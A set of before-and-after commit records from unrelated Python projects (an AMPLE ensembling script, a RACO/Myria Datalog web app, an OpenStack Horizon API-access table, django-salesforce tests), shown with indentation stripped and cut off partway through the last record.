__author__ = "Jens Thomas, and Felix Simkovic"
__date__ = "01 Oct 2016"
__version__ = "1.0"
import argparse
import os
import sys
from ample.constants import AMPLE_PKL
from ample import ensembler
from ample.util import ample_util, config_util, exit_util, logging_util, process_models
from ample.util import argparse_util
from ample.util.options_processor import process_ensemble_options
ENSEMBLE_DIRNAME = 'ample_ensemble'
parser = argparse.ArgumentParser(description="AMPLE Ensembling Module")
argparse_util.add_general_options(parser)
argparse_util.add_cluster_submit_options(parser)
argparse_util.add_ensembler_options(parser)
# Get command-line arguments and see if we have a restart_pkl option as this
# is how we pass in an existing ample dictionary when we are running the ensembling
# as a standalone job on a cluster
args = parser.parse_args()
optd = vars(args)
# Track restart as it determines if we need to unpack models
restart = False
if 'restart_pkl' in optd and optd['restart_pkl']:
if not os.path.isfile(optd['restart_pkl']):
msg = 'Cannot find ensemble pkl file: {0}'.format(optd['restart_pkl'])
exit_util.exit_error(msg)
try:
optd = ample_util.read_amoptd(optd['restart_pkl'])
except Exception as e:
msg = "Error unpickling ensemble pkl: {0}".format(e.message)
exit_util.exit_error(msg, sys.exc_info()[2])
restart = True
else:
# We're running purely from command-line arguments
amopt = config_util.AMPLEConfigOptions()
amopt.populate(args)
optd = amopt.d
# Start logging to the console
logger = logging_util.setup_console_logging()
# Make sure we have models if in standalone mode
if not restart and not ('models' in optd and optd['models'] and os.path.exists(optd['models'])):
msg = 'AMPLE ensembler requires a -models argument with a file/directory of pdbs'
exit_util.exit_error(msg, sys.exc_info()[2])
# Set up the working directory if one doesn't already exist
if not ('work_dir' in optd and optd['work_dir']):
optd['work_dir'] = os.path.join(os.path.abspath(os.path.curdir), ENSEMBLE_DIRNAME)
if not os.path.isdir(optd['work_dir']):
try:
os.mkdir(optd['work_dir'])
except OSError as e:
msg = 'Error making ensemble workdir {0} : {1}'.format(optd['work_dir'], e)
exit_util.exit_error(msg, sys.exc_info()[2])
assert os.path.isdir(optd['work_dir'])
# Start logging to a file
logging_util.setup_file_logging(os.path.join(optd['work_dir'], "ensemble.log"))
try:
if not restart:
results = process_models.extract_and_validate_models(optd)
process_models.handle_model_import(optd, results)
process_ensemble_options(optd)
optd['ensemble_ok'] = os.path.join(optd['work_dir'], 'ensemble.ok')
optd['results_path'] = os.path.join(optd['work_dir'], AMPLE_PKL)
ensembler.create_ensembles(optd)
ample_util.save_amoptd(optd)
except Exception as e:
msg = "Error running ensembling: {0}".format(e.message)
exit_util.exit_error(msg, sys.exc_info()[2])
Minor fix
#!/usr/bin/env ccp4-python
__author__ = "Jens Thomas, and Felix Simkovic"
__date__ = "01 Oct 2016"
__version__ = "1.0"
import argparse
import os
import sys
from ample.constants import AMPLE_PKL
from ample import ensembler
from ample.util import ample_util, config_util, exit_util, logging_util, process_models
from ample.util import argparse_util
from ample.util.options_processor import process_ensemble_options
ENSEMBLE_DIRNAME = 'ample_ensemble'
parser = argparse.ArgumentParser(description="AMPLE Ensembling Module")
argparse_util.add_general_options(parser)
argparse_util.add_cluster_submit_options(parser)
argparse_util.add_ensembler_options(parser)
# Get command-line arguments and see if we have a restart_pkl option as this
# is how we pass in an existing ample dictionary when we are running the ensembling
# as a standalone job on a cluster
optd = vars(parser.parse_args())
# Track restart as it determines if we need to unpack models
restart = False
if 'restart_pkl' in optd and optd['restart_pkl']:
if not os.path.isfile(optd['restart_pkl']):
msg = 'Cannot find ensemble pkl file: {0}'.format(optd['restart_pkl'])
exit_util.exit_error(msg)
try:
optd = ample_util.read_amoptd(optd['restart_pkl'])
except Exception as e:
msg = "Error unpickling ensemble pkl: {0}".format(e.message)
exit_util.exit_error(msg, sys.exc_info()[2])
restart = True
else:
# We're running purely from command-line arguments
amopt = config_util.AMPLEConfigOptions()
amopt.populate(optd)
optd = amopt.d
# Start logging to the console
logger = logging_util.setup_console_logging()
# Make sure we have models if in standalone mode
if not restart and not ('models' in optd and optd['models'] and os.path.exists(optd['models'])):
msg = 'AMPLE ensembler requires a -models argument with a file/directory of pdbs'
exit_util.exit_error(msg, sys.exc_info()[2])
# Set up the working directory if one doesn't already exist
if not ('work_dir' in optd and optd['work_dir']):
optd['work_dir'] = os.path.join(os.path.abspath(os.path.curdir), ENSEMBLE_DIRNAME)
if not os.path.isdir(optd['work_dir']):
try:
os.mkdir(optd['work_dir'])
except OSError as e:
msg = 'Error making ensemble workdir {0} : {1}'.format(optd['work_dir'], e)
exit_util.exit_error(msg, sys.exc_info()[2])
assert os.path.isdir(optd['work_dir'])
# Start logging to a file
logging_util.setup_file_logging(os.path.join(optd['work_dir'], "ensemble.log"))
try:
if not restart:
results = process_models.extract_and_validate_models(optd)
process_models.handle_model_import(optd, results)
process_ensemble_options(optd)
optd['ensemble_ok'] = os.path.join(optd['work_dir'], 'ensemble.ok')
optd['results_path'] = os.path.join(optd['work_dir'], AMPLE_PKL)
ensembler.create_ensembles(optd)
ample_util.save_amoptd(optd)
except Exception as e:
msg = "Error running ensembling: {0}".format(e.message)
exit_util.exit_error(msg, sys.exc_info()[2])
|
from raco import RACompiler
from raco.language import MyriaAlgebra
from raco.myrialang import compile_to_json
from raco.viz import plan_to_dot
from google.appengine.ext.webapp import template
import json
import myria
import os.path
import webapp2
defaultquery = """A(x) :- R(x,3)"""
hostname = "localhost"
port = 8753
def programplan(query, target):
dlog = RACompiler()
dlog.fromDatalog(query)
return dlog.logicalplan
def format_rule(expressions):
return "\n".join(["%s = %s" % e for e in expressions])
class MainPage(webapp2.RequestHandler):
def get(self, query=defaultquery):
dlog = RACompiler()
dlog.fromDatalog(query)
plan = format_rule(dlog.logicalplan)
dlog.optimize(target=MyriaAlgebra, eliminate_common_subexpressions=False)
myria_plan = format_rule(dlog.physicalplan)
self.response.headers['Content-Type'] = 'text/html'
path = os.path.join(os.path.dirname(__file__), 'templates/editor.html')
try:
connection = myria.MyriaConnection(hostname=hostname, port=port)
workers = connection.workers()
connection_string = "(%s:%d [%d workers])" % (hostname, port, len(workers))
except myria.MyriaError:
connection_string = "(unable to connect to %s:%d)" % (hostname, port)
self.response.out.write(template.render(path, locals()))
class Plan(webapp2.RequestHandler):
def get(self):
query = self.request.get("query")
dlog = RACompiler()
dlog.fromDatalog(query)
plan = format_rule(dlog.logicalplan)
self.response.headers['Content-Type'] = 'text/plain'
self.response.write(plan)
class Optimize(webapp2.RequestHandler):
def get(self):
query = self.request.get("query")
dlog = RACompiler()
dlog.fromDatalog(query)
dlog.optimize(target=MyriaAlgebra, eliminate_common_subexpressions=False)
optimized = format_rule(dlog.physicalplan)
self.response.headers['Content-Type'] = 'text/plain'
self.response.write(optimized)
class Compile(webapp2.RequestHandler):
def get(self):
query = self.request.get("query")
dlog = RACompiler()
dlog.fromDatalog(query)
# Cache logical plan
cached_logicalplan = str(dlog.logicalplan)
# Generate physical plan
dlog.optimize(target=MyriaAlgebra, eliminate_common_subexpressions=False)
compiled = compile_to_json(query, cached_logicalplan, dlog.physicalplan)
self.response.headers['Content-Type'] = 'application/json'
self.response.write(json.dumps(compiled))
class Execute(webapp2.RequestHandler):
def post(self):
try:
connection = myria.MyriaConnection(hostname=hostname, port=port)
except myria.MyriaError:
self.response.headers['Content-Type'] = 'text/plain'
self.response.write("Unable to connect to REST server to issue query")
self.response.status = 503
return
query = self.request.get("query")
dlog = RACompiler()
dlog.fromDatalog(query)
# Cache logical plan
cached_logicalplan = str(dlog.logicalplan)
# Generate physical plan
dlog.optimize(target=MyriaAlgebra, eliminate_common_subexpressions=False)
compiled = compile_to_json(query, cached_logicalplan, dlog.physicalplan)
# Issue the query
try:
query_status = connection.submit_query(compiled)
query_url = 'http://%s:%d/execute?query_id=%d' % (hostname, port, query_status['query_id'])
ret = {'query_status' : query_status, 'url' : query_url}
self.response.status = 201
self.response.headers['Content-Type'] = 'application/json'
self.response.headers['Content-Location'] = query_url
self.response.write(json.dumps(ret))
return
except myria.MyriaError as e:
self.response.headers['Content-Type'] = 'text/plain'
self.response.status = 400
self.response.write(e)
return
def get(self):
try:
connection = myria.MyriaConnection(hostname=hostname, port=port)
except myria.MyriaError:
self.response.headers['Content-Type'] = 'text/plain'
self.response.status = 503
self.response.write("Unable to connect to REST server to issue query")
return
query_id = self.request.get("query_id")
try:
query_status = connection.get_query_status(query_id)
self.response.headers['Content-Type'] = 'application/json'
ret = {'query_status' : query_status, 'url' : self.request.url}
self.response.write(json.dumps(ret))
except myria.MyriaError as e:
self.response.headers['Content-Type'] = 'text/plain'
self.response.write(e)
class Dot(webapp2.RequestHandler):
def get(self):
query = self.request.get("query")
svg_type = self.request.get("type")
dlog = RACompiler()
dlog.fromDatalog(query)
if svg_type is None or len(svg_type) == 0 or svg_type.lower() == "ra":
plan = dlog.logicalplan
elif svg_type.lower() == "myria":
dlog.optimize(target=MyriaAlgebra, eliminate_common_subexpressions=False)
plan = dlog.physicalplan
else:
self.abort(400, detail="argument type expected 'ra' or 'myria'")
self.response.headers['Content-Type'] = 'text/plain'
self.response.write(plan_to_dot(plan))
app = webapp2.WSGIApplication([
('/', MainPage),
('/plan', Plan),
('/optimize', Optimize),
('/compile', Compile),
('/execute', Execute),
('/dot', Dot)
],
debug=True
)
"""
TODO:
Debug conditions: A(x,z) :- R(x,p1,y),R(y,p2,z),R(z,p3,w)
Multiple rules
Recursion
Show graph visually
Protobuf
Show parse errors (with link to error)
"""
Retarget to deployment on DB cluster
Signed-off-by: Daniel Halperin <1a02732a15f637c31107256cbee5819e36aa7c67@cs.washington.edu>
from raco import RACompiler
from raco.language import MyriaAlgebra
from raco.myrialang import compile_to_json
from raco.viz import plan_to_dot
from google.appengine.ext.webapp import template
import json
import myria
import os.path
import webapp2
defaultquery = """A(x) :- R(x,3)"""
hostname = "vega.cs.washington.edu"
port = 1776
def programplan(query, target):
dlog = RACompiler()
dlog.fromDatalog(query)
return dlog.logicalplan
def format_rule(expressions):
return "\n".join(["%s = %s" % e for e in expressions])
class MainPage(webapp2.RequestHandler):
def get(self, query=defaultquery):
dlog = RACompiler()
dlog.fromDatalog(query)
plan = format_rule(dlog.logicalplan)
dlog.optimize(target=MyriaAlgebra, eliminate_common_subexpressions=False)
myria_plan = format_rule(dlog.physicalplan)
self.response.headers['Content-Type'] = 'text/html'
path = os.path.join(os.path.dirname(__file__), 'templates/editor.html')
try:
connection = myria.MyriaConnection(hostname=hostname, port=port)
workers = connection.workers()
connection_string = "(%s:%d [%d workers])" % (hostname, port, len(workers))
except myria.MyriaError:
connection_string = "(unable to connect to %s:%d)" % (hostname, port)
self.response.out.write(template.render(path, locals()))
class Plan(webapp2.RequestHandler):
def get(self):
query = self.request.get("query")
dlog = RACompiler()
dlog.fromDatalog(query)
plan = format_rule(dlog.logicalplan)
self.response.headers['Content-Type'] = 'text/plain'
self.response.write(plan)
class Optimize(webapp2.RequestHandler):
def get(self):
query = self.request.get("query")
dlog = RACompiler()
dlog.fromDatalog(query)
dlog.optimize(target=MyriaAlgebra, eliminate_common_subexpressions=False)
optimized = format_rule(dlog.physicalplan)
self.response.headers['Content-Type'] = 'text/plain'
self.response.write(optimized)
class Compile(webapp2.RequestHandler):
def get(self):
query = self.request.get("query")
dlog = RACompiler()
dlog.fromDatalog(query)
# Cache logical plan
cached_logicalplan = str(dlog.logicalplan)
# Generate physical plan
dlog.optimize(target=MyriaAlgebra, eliminate_common_subexpressions=False)
compiled = compile_to_json(query, cached_logicalplan, dlog.physicalplan)
self.response.headers['Content-Type'] = 'application/json'
self.response.write(json.dumps(compiled))
class Execute(webapp2.RequestHandler):
def post(self):
try:
connection = myria.MyriaConnection(hostname=hostname, port=port)
except myria.MyriaError:
self.response.headers['Content-Type'] = 'text/plain'
self.response.write("Unable to connect to REST server to issue query")
self.response.status = 503
return
query = self.request.get("query")
dlog = RACompiler()
dlog.fromDatalog(query)
# Cache logical plan
cached_logicalplan = str(dlog.logicalplan)
# Generate physical plan
dlog.optimize(target=MyriaAlgebra, eliminate_common_subexpressions=False)
compiled = compile_to_json(query, cached_logicalplan, dlog.physicalplan)
# Issue the query
try:
query_status = connection.submit_query(compiled)
query_url = 'http://%s:%d/execute?query_id=%d' % (hostname, port, query_status['query_id'])
ret = {'query_status' : query_status, 'url' : query_url}
self.response.status = 201
self.response.headers['Content-Type'] = 'application/json'
self.response.headers['Content-Location'] = query_url
self.response.write(json.dumps(ret))
return
except myria.MyriaError as e:
self.response.headers['Content-Type'] = 'text/plain'
self.response.status = 400
self.response.write(e)
return
def get(self):
try:
connection = myria.MyriaConnection(hostname=hostname, port=port)
except myria.MyriaError:
self.response.headers['Content-Type'] = 'text/plain'
self.response.status = 503
self.response.write("Unable to connect to REST server to issue query")
return
query_id = self.request.get("query_id")
try:
query_status = connection.get_query_status(query_id)
self.response.headers['Content-Type'] = 'application/json'
ret = {'query_status' : query_status, 'url' : self.request.url}
self.response.write(json.dumps(ret))
except myria.MyriaError as e:
self.response.headers['Content-Type'] = 'text/plain'
self.response.write(e)
class Dot(webapp2.RequestHandler):
def get(self):
query = self.request.get("query")
svg_type = self.request.get("type")
dlog = RACompiler()
dlog.fromDatalog(query)
if svg_type is None or len(svg_type) == 0 or svg_type.lower() == "ra":
plan = dlog.logicalplan
elif svg_type.lower() == "myria":
dlog.optimize(target=MyriaAlgebra, eliminate_common_subexpressions=False)
plan = dlog.physicalplan
else:
self.abort(400, detail="argument type expected 'ra' or 'myria'")
self.response.headers['Content-Type'] = 'text/plain'
self.response.write(plan_to_dot(plan))
app = webapp2.WSGIApplication([
('/', MainPage),
('/plan', Plan),
('/optimize', Optimize),
('/compile', Compile),
('/execute', Execute),
('/dot', Dot)
],
debug=True
)
"""
TODO:
Debug conditions: A(x,z) :- R(x,p1,y),R(y,p2,z),R(z,p3,w)
Multiple rules
Recursion
Show graph visually
Protobuf
Show parse errors (with link to error)
"""
|
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.template.defaultfilters import title
from django.utils.translation import ugettext_lazy as _
from openstack_auth import utils
from horizon import tables
from openstack_dashboard import api
from openstack_dashboard.dashboards.project.api_access import forms
from openstack_dashboard import policy
def pretty_service_names(name):
name = name.replace('-', ' ')
if name in ['ec2', 's3']:
name = name.upper()
else:
name = title(name)
return name
class DownloadEC2(tables.LinkAction):
name = "download_ec2"
verbose_name = _("Download EC2 Credentials")
verbose_name_plural = _("Download EC2 Credentials")
icon = "download"
url = "horizon:project:access_and_security:api_access:ec2"
policy_rules = (("compute", "os_compute_api:os-certificates:create"),)
def allowed(self, request, datum=None):
return api.base.is_service_enabled(request, 'ec2')
class DownloadCloudsYaml(tables.LinkAction):
name = "download_clouds_yaml"
verbose_name = _("Download OpenStack clouds.yaml File")
verbose_name_plural = _("Download OpenStack clouds.yaml File")
icon = "download"
url = "horizon:project:api_access:clouds.yaml"
class DownloadOpenRC(tables.LinkAction):
name = "download_openrc"
verbose_name = _("Download OpenStack RC File v3")
verbose_name_plural = _("Download OpenStack RC File v3")
icon = "download"
url = "horizon:project:api_access:openrc"
def allowed(self, request, datum=None):
return utils.get_keystone_version() >= 3
class DownloadOpenRCv2(tables.LinkAction):
name = "download_openrc_v2"
verbose_name = _("Download OpenStack RC File v2.0")
verbose_name_plural = _("Download OpenStack RC File v2.0")
icon = "download"
url = "horizon:project:api_access:openrcv2"
class ViewCredentials(tables.LinkAction):
name = "view_credentials"
verbose_name = _("View Credentials")
classes = ("ajax-modal", )
icon = "eye"
url = "horizon:project:api_access:view_credentials"
class RecreateCredentials(tables.LinkAction):
name = "recreate_credentials"
verbose_name = _("Recreate EC2 Credentials")
classes = ("ajax-modal",)
icon = "refresh"
url = \
"horizon:project:access_and_security:api_access:recreate_credentials"
policy_rules = (("compute", "os_compute_api:certificates:create"))
action_type = "danger"
def allowed(self, request, datum=None):
try:
target = {"target.credential.user_id": request.user.id}
if (api.base.is_service_enabled(request, 'ec2') and
forms.get_ec2_credentials(request) and
policy.check((("identity", "identity:ec2_create_credential"),
("identity", "identity:ec2_delete_credential")),
request, target=target)):
return True
except Exception:
pass
return False
class EndpointsTable(tables.DataTable):
api_name = tables.Column('type',
verbose_name=_("Service"),
filters=(pretty_service_names,))
api_endpoint = tables.Column('public_url',
verbose_name=_("Service Endpoint"))
class Meta(object):
name = "endpoints"
verbose_name = _("API Endpoints")
multi_select = False
table_actions = (DownloadCloudsYaml, DownloadOpenRCv2, DownloadOpenRC,
DownloadEC2,
ViewCredentials, RecreateCredentials)
Fix EC2 related buttons url in the api access page
access_and_security has moved to separate panel since
https://blueprints.launchpad.net/horizon/+spec/reorganise-access-and-security,
but Download/Recreate EC2 Credentials url were not updated.
Change-Id: Ie16aabb7c272ef871138c59737e694966d7f5168
Closes-Bug: #1686088
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.template.defaultfilters import title
from django.utils.translation import ugettext_lazy as _
from openstack_auth import utils
from horizon import tables
from openstack_dashboard import api
from openstack_dashboard.dashboards.project.api_access import forms
from openstack_dashboard import policy
def pretty_service_names(name):
name = name.replace('-', ' ')
if name in ['ec2', 's3']:
name = name.upper()
else:
name = title(name)
return name
class DownloadEC2(tables.LinkAction):
name = "download_ec2"
verbose_name = _("Download EC2 Credentials")
verbose_name_plural = _("Download EC2 Credentials")
icon = "download"
url = "horizon:project:api_access:ec2"
policy_rules = (("compute", "os_compute_api:os-certificates:create"),)
def allowed(self, request, datum=None):
return api.base.is_service_enabled(request, 'ec2')
class DownloadCloudsYaml(tables.LinkAction):
name = "download_clouds_yaml"
verbose_name = _("Download OpenStack clouds.yaml File")
verbose_name_plural = _("Download OpenStack clouds.yaml File")
icon = "download"
url = "horizon:project:api_access:clouds.yaml"
class DownloadOpenRC(tables.LinkAction):
name = "download_openrc"
verbose_name = _("Download OpenStack RC File v3")
verbose_name_plural = _("Download OpenStack RC File v3")
icon = "download"
url = "horizon:project:api_access:openrc"
def allowed(self, request, datum=None):
return utils.get_keystone_version() >= 3
class DownloadOpenRCv2(tables.LinkAction):
name = "download_openrc_v2"
verbose_name = _("Download OpenStack RC File v2.0")
verbose_name_plural = _("Download OpenStack RC File v2.0")
icon = "download"
url = "horizon:project:api_access:openrcv2"
class ViewCredentials(tables.LinkAction):
name = "view_credentials"
verbose_name = _("View Credentials")
classes = ("ajax-modal", )
icon = "eye"
url = "horizon:project:api_access:view_credentials"
class RecreateCredentials(tables.LinkAction):
name = "recreate_credentials"
verbose_name = _("Recreate EC2 Credentials")
classes = ("ajax-modal",)
icon = "refresh"
url = "horizon:project:api_access:recreate_credentials"
policy_rules = (("compute", "os_compute_api:certificates:create"))
action_type = "danger"
def allowed(self, request, datum=None):
try:
target = {"target.credential.user_id": request.user.id}
if (api.base.is_service_enabled(request, 'ec2') and
forms.get_ec2_credentials(request) and
policy.check((("identity", "identity:ec2_create_credential"),
("identity", "identity:ec2_delete_credential")),
request, target=target)):
return True
except Exception:
pass
return False
class EndpointsTable(tables.DataTable):
api_name = tables.Column('type',
verbose_name=_("Service"),
filters=(pretty_service_names,))
api_endpoint = tables.Column('public_url',
verbose_name=_("Service Endpoint"))
class Meta(object):
name = "endpoints"
verbose_name = _("API Endpoints")
multi_select = False
table_actions = (DownloadCloudsYaml, DownloadOpenRCv2, DownloadOpenRC,
DownloadEC2,
ViewCredentials, RecreateCredentials)
|
delete empty file
|
# django-salesforce
#
# by Phil Christensen
# (c) 2012-2013 Freelancers Union (http://www.freelancersunion.org)
# See LICENSE.md for details
#
import datetime
import pytz
from django.conf import settings
from django.db import connections
from django.test import TestCase
import django
from salesforce.testrunner.example.models import (Account, Contact, Lead, User,
BusinessHours, ChargentOrder, CronTrigger,
GeneralCustomModel, test_custom_db_table, test_custom_db_column)
import logging
log = logging.getLogger(__name__)
DJANGO_14 = django.VERSION[:2] >= (1,4)
current_user = settings.DATABASES['salesforce']['USER']
test_email = 'test-djsf-unittests-email@example.com'
sf_tables = [x['name'] for x in
connections['salesforce'].introspection.table_list_cache['sobjects']
]
def refresh(obj):
"""
Get the same object refreshed from db.
"""
return obj.__class__.objects.get(pk=obj.pk)
def round_datetime_utc(timestamp):
"""Round to seconds and set zone to UTC."""
## sfdates are UTC to seconds precision but use a fixed-offset
## of +0000 (as opposed to a named tz)
timestamp = timestamp.replace(microsecond=0)
if DJANGO_14:
timestamp= timestamp.replace(tzinfo=pytz.utc)
return timestamp
class BasicSOQLTest(TestCase):
def setUp(self):
"""
Create our test lead record.
"""
self.test_lead = Lead(
FirstName = "User",
LastName = "Unittest General",
Email = test_email,
Status = 'Open',
Company = "Some company, Ltd.",
)
self.test_lead.save()
def tearDown(self):
"""
Clean up our test lead record.
"""
self.test_lead.delete()
def test_raw(self):
"""
Get the first two contact records.
"""
contacts = Contact.objects.raw(
"SELECT Id, LastName, FirstName FROM Contact "
"LIMIT 2")
self.assertEqual(len(contacts), 2)
'%s' % contacts[0].__dict__ # Check that all fields are accessible
def test_raw_foreignkey_id(self):
"""
Get the first two contacts by raw query with a ForeignKey id field.
"""
contacts = Contact.objects.raw(
"SELECT Id, LastName, FirstName, OwnerId FROM Contact "
"LIMIT 2")
self.assertEqual(len(contacts), 2)
'%s' % contacts[0].__dict__ # Check that all fields are accessible
self.assertIn('@', contacts[0].Owner.Email)
def test_select_all(self):
"""
Get the first two contact records.
"""
contacts = Contact.objects.all()[0:2]
self.assertEqual(len(contacts), 2)
def test_exclude_query_construction(self):
"""
Test that exclude query construction returns valid SOQL.
"""
contacts = Contact.objects.filter(FirstName__isnull=False).exclude(Email="steve@apple.com", LastName="Wozniak").exclude(LastName="smith")
number_of_contacts = contacts.count()
self.assertIsInstance(number_of_contacts, int)
def test_foreign_key(self):
"""
Verify that the owner of an Contact is the currently logged admin.
"""
contact = Contact.objects.all()[0]
user = contact.Owner
# This user can be e.g. 'admins@freelancersunion.org.prod001'.
self.assertEqual(user.Username, current_user)
def test_update_date(self):
"""
Test updating a date.
"""
now = round_datetime_utc(datetime.datetime.utcnow())
contact = Contact.objects.all()[0]
old_date = contact.EmailBouncedDate
contact.EmailBouncedDate = now.replace(tzinfo=pytz.utc)
contact.save()
try:
self.assertEqual(refresh(contact).EmailBouncedDate, now)
finally:
contact.EmailBouncedDate = old_date
contact.save()
self.assertEqual(refresh(contact).EmailBouncedDate, old_date)
def test_insert_date(self):
"""
Test inserting a date.
"""
now = round_datetime_utc(datetime.datetime.utcnow())
contact = Contact(
FirstName = 'Joe',
LastName = 'Freelancer',
EmailBouncedDate=now.replace(tzinfo=pytz.utc))
contact.save()
try:
self.assertEqual(refresh(contact).EmailBouncedDate, now)
finally:
contact.delete()
def test_default_specified_by_sf(self):
"""
Verify that an object with a field with default value specified by some
Salesforce code can be inserted. (The default is used only for a field
unspecified in SF REST API, but not for None or any similar value.
It was a pain for some unimportant foreign keys that don't accept null.
"""
# Verify a smart default is used.
contact = Contact(FirstName = 'sf_test', LastName='my')
contact.save()
try:
self.assertEqual(refresh(contact).Owner.Username, current_user)
finally:
contact.delete()
# Verify that an explicit value is possible for this field.
other_user_obj = User.objects.exclude(Username=current_user)[0]
contact = Contact(FirstName = 'sf_test', LastName='your',
Owner=other_user_obj)
contact.save()
try:
self.assertEqual(
refresh(contact).Owner.Username, other_user_obj.Username)
finally:
contact.delete()
def test_get(self):
"""
Get the test lead record.
"""
lead = Lead.objects.get(Email=test_email)
self.assertEqual(lead.FirstName, 'User')
self.assertEqual(lead.LastName, 'Unittest General')
# test a read only field (formula of full name)
self.assertEqual(lead.Name, 'User Unittest General')
def test_not_null(self):
"""
Get the test lead record by isnull condition.
"""
# TODO similar failed: Contact.objects.filter(Account__isnull=True)
# passed: Contact.objects.filter(Account=None)
lead = Lead.objects.get(Email__isnull=False, FirstName='User')
self.assertEqual(lead.FirstName, 'User')
self.assertEqual(lead.LastName, 'Unittest General')
def test_unicode(self):
"""
Make sure weird unicode breaks properly.
"""
test_lead = Lead(FirstName=u'\u2603', LastName="Unittest Unicode",
Email='test-djsf-unicode-email@example.com',
Company="Some company")
test_lead.save()
try:
self.assertEqual(refresh(test_lead).FirstName, u'\u2603')
finally:
test_lead.delete()
def test_date_comparison(self):
"""
Test that date comparisons work properly.
"""
today = round_datetime_utc(datetime.datetime(2013, 8, 27))
yesterday = today - datetime.timedelta(days=1)
tomorrow = today + datetime.timedelta(days=1)
contact = Contact(FirstName='sf_test', LastName='date',
EmailBouncedDate=today)
contact.save()
try:
contacts1 = Contact.objects.filter(EmailBouncedDate__gt=yesterday)
self.assertEqual(len(contacts1), 1)
contacts2 = Contact.objects.filter(EmailBouncedDate__gt=tomorrow)
self.assertEqual(len(contacts2), 0)
finally:
contact.delete()
def test_insert(self):
"""
Create a lead record, and make sure it ends up with a valid Salesforce ID.
"""
test_lead = Lead(FirstName="User", LastName="Unittest Inserts",
Email='test-djsf-inserts-email@example.com',
Company="Some company")
test_lead.save()
try:
self.assertEqual(len(test_lead.pk), 18)
finally:
test_lead.delete()
def test_delete(self):
"""
Create a lead record, then delete it, and make sure it's gone.
"""
test_lead = Lead(FirstName="User", LastName="Unittest Deletes",
Email='test-djsf-delete-email@example.com',
Company="Some company")
test_lead.save()
test_lead.delete()
self.assertRaises(Lead.DoesNotExist, Lead.objects.get, Email='test-djsf-delete-email@example.com')
def test_update(self):
"""
Update the test lead record.
"""
test_lead = Lead.objects.get(Email=test_email)
self.assertEquals(test_lead.FirstName, 'User')
test_lead.FirstName = 'Tested'
test_lead.save()
self.assertEqual(refresh(test_lead).FirstName, 'Tested')
def test_custom_objects(self):
"""
Make sure custom objects work.
"""
if not 'ChargentOrders__ChargentOrder__c' in sf_tables:
self.skipTest('Not found custom tables ChargentOrders__*')
orders = ChargentOrder.objects.all()[0:5]
self.assertEqual(len(orders), 5)
def test_custom_object_general(self):
"""
Create, read and delete any general custom object.
Object name and field name are user configurable by TEST_CUSTOM_FIELD.
"""
table_list_cache = connections['salesforce'].introspection.table_list_cache
table_names = [x['name'] for x in table_list_cache['sobjects']]
if not test_custom_db_table in sf_tables:
self.skipTest("Not found the expected custom object '%s'" %
test_custom_db_table)
obj = GeneralCustomModel(GeneralCustomField='sf_test')
obj.save()
try:
results = GeneralCustomModel.objects.all()[0:1]
self.assertEqual(len(results), 1)
self.assertEqual(results[0].GeneralCustomField, 'sf_test')
finally:
obj.delete()
def test_datetime_miliseconds(self):
"""
Verify that a field with milisecond resolution is readable.
"""
trigger = CronTrigger.objects.all()[0]
self.assertTrue(isinstance(trigger.PreviousFireTime, datetime.datetime))
# The reliability of this is only 99.9%, therefore it is commented out.
#self.assertNotEqual(trigger.PreviousFireTime.microsecond, 0)
def test_time_field(self):
"""
Test a TimeField (read, modify, verify).
"""
obj_orig = BusinessHours.objects.all()[0]
obj = refresh(obj_orig)
self.assertTrue(isinstance(obj.MondayStartTime, datetime.time))
obj.MondayStartTime = datetime.time(23, 59)
obj.save()
obj = refresh(obj)
try:
self.assertEqual(obj.MondayStartTime, datetime.time(23, 59))
finally:
obj_orig.save()
def test_account_insert_delete(self):
"""
Test insert and delete an account (normal or personal SF config)
"""
if settings.PERSON_ACCOUNT_ACTIVATED:
test_account = Account(FirstName='IntegrationTest',
LastName='Account')
else:
test_account = Account(Name='IntegrationTest Account')
test_account.save()
try:
accounts = Account.objects.filter(Name='IntegrationTest Account')
self.assertEqual(len(accounts), 1)
finally:
test_account.delete()
def test_similarity_filter_operators(self):
"""
Test filter operators that use LIKE 'something%' and similar.
"""
User.objects.get(Username__exact=current_user)
User.objects.get(Username__iexact=current_user.upper())
User.objects.get(Username__contains=current_user[1:-1])
User.objects.get(Username__icontains=current_user[1:-1].upper())
User.objects.get(Username__startswith=current_user[:-1])
User.objects.get(Username__istartswith=current_user[:-1].upper())
User.objects.get(Username__endswith=current_user[1:])
User.objects.get(Username__iendswith=current_user[1:].upper())
# Operators regex and iregex not tested because they are not supported.
def test_unsupported_bulk_create(self):
"""
Unsupported bulk_create: "Errors should never pass silently."
"""
if not DJANGO_14:
self.skipTest('Django 1.3 has no bulk operations.')
objects = [Contact(LastName='sf_test a'), Contact(LastName='sf_test b')]
self.assertRaises(AssertionError, Contact.objects.bulk_create, objects)
Add test for escaping single quotes.
# django-salesforce
#
# by Phil Christensen
# (c) 2012-2013 Freelancers Union (http://www.freelancersunion.org)
# See LICENSE.md for details
#
import datetime
import pytz
from django.conf import settings
from django.db import connections
from django.test import TestCase
import django
from salesforce.testrunner.example.models import (Account, Contact, Lead, User,
BusinessHours, ChargentOrder, CronTrigger,
GeneralCustomModel, test_custom_db_table, test_custom_db_column)
import logging
log = logging.getLogger(__name__)
DJANGO_14 = django.VERSION[:2] >= (1,4)
current_user = settings.DATABASES['salesforce']['USER']
test_email = 'test-djsf-unittests-email@example.com'
sf_tables = [x['name'] for x in
connections['salesforce'].introspection.table_list_cache['sobjects']
]
def refresh(obj):
"""
Get the same object refreshed from db.
"""
return obj.__class__.objects.get(pk=obj.pk)
def round_datetime_utc(timestamp):
"""Round to seconds and set zone to UTC."""
## sfdates are UTC to seconds precision but use a fixed-offset
## of +0000 (as opposed to a named tz)
timestamp = timestamp.replace(microsecond=0)
if DJANGO_14:
